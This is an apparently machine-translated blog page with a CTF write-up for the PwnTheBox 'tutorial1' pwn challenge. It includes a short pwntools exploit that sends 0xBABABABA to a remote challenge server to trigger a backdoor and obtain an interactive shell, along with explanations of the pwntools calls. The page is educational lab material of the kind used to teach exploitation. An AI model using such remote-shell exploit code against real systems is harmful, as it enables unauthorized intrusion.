当前位置:网站首页>PwnTheBox,Pwn:tutorial1
PwnTheBox,Pwn:tutorial1
2022-06-10 23:13:00 【Part 02】

analysis , When buf The stored value is 0xBABABABA ( Hexadecimal ) when , Would call backdoor function

stay backdoor Command execution in , You can use system obtain shell
Sum up ,payload yes 0xBABABABA
exp:
from pwn improt *
context(log_level='debug')
p = remote('redirect.do-not-trust.hacking.run',10146)
payload = 0xBABABABA
p.sendline(p64(payload))
p.recv()
p.interactive()-context(os='linux', arch='amd64', log_level='debug')
1. os Set the system to linux System , At the completion of ctf When it comes to the topic , majority pwn The title system is linux
2. arch Set the schema to amd64, You can simply think of the setting as 64 Bit pattern , Corresponding 32 Bit mode is ’i386’
3. log_level Set the level of log output to debug, This sentence is usually set during debugging , such pwntools It will be complete io The process is printed out , Make debugging more convenient , It can be avoided when CTF There are some and IO Related errors .-remote The module accesses the remote server
-sendline(data) : Send a line of data , It is equivalent to adding... At the end of the data \n.
-recv(numb= Byte size , timeout=default) : Receive the specified number of bytes .
-interactive() : Acquire shell Then use , Interact directly , It's like going back to shell The pattern of .
Get through , Get directory

obtain flag

边栏推荐
- vulnhub之dc3
- Is it safe to open a BOC securities account? Is the risk high?
- SMB anonymous
- Watlow签订从施耐德电气手中收购Eurotherm的协议
- 但身示你五县非那最土zaiFKMW
- 06151020 mysterious code, waiting for you to decipher
- [QPSK if] Verilog design of QPSK IF signal generation module based on FPGA
- 云数据中心中的SDN/NFV应用
- 爬虫学习知识
- 联想首次详解混合云Lenovo xCloud五大优势,如何打造智能化数字底座
猜你喜欢

完美解码PureCodec 20220601

爬虫学习知识

数据与信息资源共享平台(八)

LeetCode+ 16 - 20
![[QPSK if] Verilog design of QPSK IF signal generation module based on FPGA](/img/7d/b021790f1fde266ff9aa360261d581.png)
[QPSK if] Verilog design of QPSK IF signal generation module based on FPGA

【原创】医鹿APP九价HPV数据抓包分析
![[original] analysis of nine price HPV data capture of Yilu app](/img/f2/c792367beea0956fe69aad5d35581a.png)
[original] analysis of nine price HPV data capture of Yilu app

Development and implementation of AI intelligent video analysis easycvr platform device channel batch deletion function
A journey of database full SQL analysis and audit system performance optimization

Web3技术栈权威指南【2022】
随机推荐
Face recognition software based on deepface model
【006】初识字符串
云数据中心中的SDN/NFV应用
Distributed Foundation
关于String.format(String format, Object... args)
Flowable BPMN相关知识
Vulnhub练习 DC-1靶机
AI智能视频分析EasyCVR平台设备通道批量删除功能的开发实现
通达信股票开户安全吗?如何办理开户呢?
IPO can't cure Weima's complications?
MySQL MVCC 多版本并发控制
Display of successful cases of target customer matching data table
[raise bar C #] how to call the base of the interface
简单阻抗匹配电路及公式
That's great. The Ministry of industry and information technology has launched an internet account with a "one click unbinding" mobile phone number, which can be called an artifact
Basic knowledge learning of Web cluster (1)
Native support for the first version of arm64! Microsoft win11/10 free tool set PowerToys 0.59 release
【QPSK中频】基于FPGA的QPSK中频信号产生模块verilog设计
MySQL related -0416
【原创】医鹿APP九价HPV数据抓包分析